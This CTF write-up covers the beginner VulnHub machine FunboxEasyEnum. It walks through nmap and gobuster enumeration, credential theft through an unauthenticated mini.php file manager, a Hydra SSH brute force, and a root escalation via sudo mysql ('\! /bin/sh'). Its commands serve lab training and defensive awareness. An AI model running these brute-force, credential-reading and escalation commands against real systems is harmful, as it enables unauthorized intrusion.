CTF WRITEUP VULNHUB LINUX EASY

FunboxEasyEnum — PHP Shell & MySQL Root

person

Written By

Th0mas_sh316y

Difficulty

Platform

VulnHub

Technique

GTFOBins · MySQL Sudo

FunboxEasyEnum Machine
Machine: FunboxEasyEnum · Easy · Linux · VulnHub

FunboxEasyEnum is an Easy-difficulty VulnHub machine well suited to beginners who want to practice web enumeration, file manager exploitation, and sudo-based privilege escalation. The machine exposes an unsecured PHP file manager (mini.php) on the web root, which enables arbitrary file reads. This leads either to direct credential recovery from a PHPMyAdmin configuration file or, alternatively, to SSH access via Hydra brute force. Either path eventually lands at a sudo MySQL entry that provides a clean GTFOBins shell escape to root.

01_Reconnaissance

An Nmap scan identifies a standard Linux web server. The HTTP service on port 80 is the primary attack surface. Aggressive version detection and default script execution are used to gather as much information as possible in a single scan pass.

terminal / nmap 
$ sudo nmap -p22,80 <TARGET_IP> -sV -A -sC

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1
80/tcp open  http    Apache httpd 2.4.29 (Ubuntu)

02_Web_Enumeration — Discovering mini.php

The default web root does not immediately present an obvious attack surface. Directory enumeration with a wordlist reveals several interesting paths, most notably mini.php — a single-file PHP file manager that is accessible without authentication.

terminal / directory brute force 
$ gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

/index.php      (Status: 200)
/mini.php       (Status: 200)  ← PHP file manager
/phpmyadmin     (Status: 301)

# Confirm mini.php is accessible
$ curl http://<TARGET_IP>/mini.php

Security Risk — Unauthenticated File Managers

mini.php is a popular single-file PHP file manager often used for quick server-side file browsing. Leaving it in a publicly accessible web root without authentication is a critical misconfiguration. It allows any visitor to browse the server's file system, read configuration files, upload shells, and execute commands — essentially granting full server access through a browser.

Through the mini.php interface, we can navigate the server file system. The PHPMyAdmin configuration file at /etc/phpmyadmin/config-db.php contains database credentials in plaintext.

terminal / phpmyadmin config 
$ cat /etc/phpmyadmin/config-db.php

<?php
$dbuser='phpmyadmin';
$dbpass='[REDACTED]';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql'

03_Alternative_Path — Hydra SSH Brute Force

If web-based credential recovery is blocked or unavailable, SSH brute force against a recovered username list is a viable alternative. Enumerating usernames from system files (accessible via mini.php reading /etc/passwd) provides a targeted list, significantly reducing brute force time.

terminal / hydra SSH 
$ hydra -L usrn.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ssh://<TARGET_IP>:22 -t 64 -I

[22][ssh] host: <TARGET_IP>   login: goat   password: [REDACTED]

$ ssh goat@<TARGET_IP>
Password: [REDACTED]

goat@funbox3:~$ id
uid=1001(goat) gid=1001(goat) groups=1001(goat)

Note — Two Paths, Same Destination

Both paths — credential extraction via mini.php and Hydra SSH brute force — lead to the same privilege escalation vector. In real engagements, having multiple access paths is valuable for redundancy. The faster path here is always the config file extraction, as Hydra against a large wordlist can take significant time.

04_PrivEsc — MySQL GTFOBins Sudo Escape

Once on the box as any system user, sudo -l reveals a critical misconfiguration: the current user can run /usr/bin/mysql as root without a password. MySQL's -e flag executes a SQL statement non-interactively. The \! /bin/sh syntax within MySQL spawns a system shell from within the database client — as root.

terminal / privilege escalation 
$ sudo -l
Matching Defaults entries:
    env_reset, mail_badpass

User goat may run the following commands:
    (root) NOPASSWD: /usr/bin/mysql

# GTFOBins — MySQL shell escape
$ sudo -u root /usr/bin/mysql -e '\! /bin/sh'

# id → uid=0(root)

# whoami
root

# cat /root/root.txt

Technique Note — MySQL GTFOBins

The MySQL client supports a shell escape via the \! command, which passes the following string directly to the system shell. When MySQL is invoked with sudo, this shell runs as the sudo target (root). The -e flag allows this to be executed non-interactively in a single command without needing to enter the MySQL interactive prompt. This technique is documented at GTFOBins — mysql. Any database client with a shell escape command should be treated as a privilege escalation vector when accessible via sudo.

05_Attack_Chain_Summary

  1. 01 Nmap scan → ports 22 (SSH), 80 (HTTP) confirmed
  2. 02 Gobuster → mini.php discovered (unauthenticated PHP file manager)
  3. 03 Path A: mini.php → /etc/phpmyadmin/config-db.php → plaintext credentials
  4. 04 Path B: mini.php → /etc/passwd → username list → Hydra SSH → goat:[REDACTED]
  5. 05 SSH login as system user (goat or phpmyadmin)
  6. 06 sudo -l → (root) NOPASSWD: /usr/bin/mysql
  7. 07 sudo -u root /usr/bin/mysql -e '\! /bin/sh' → ROOT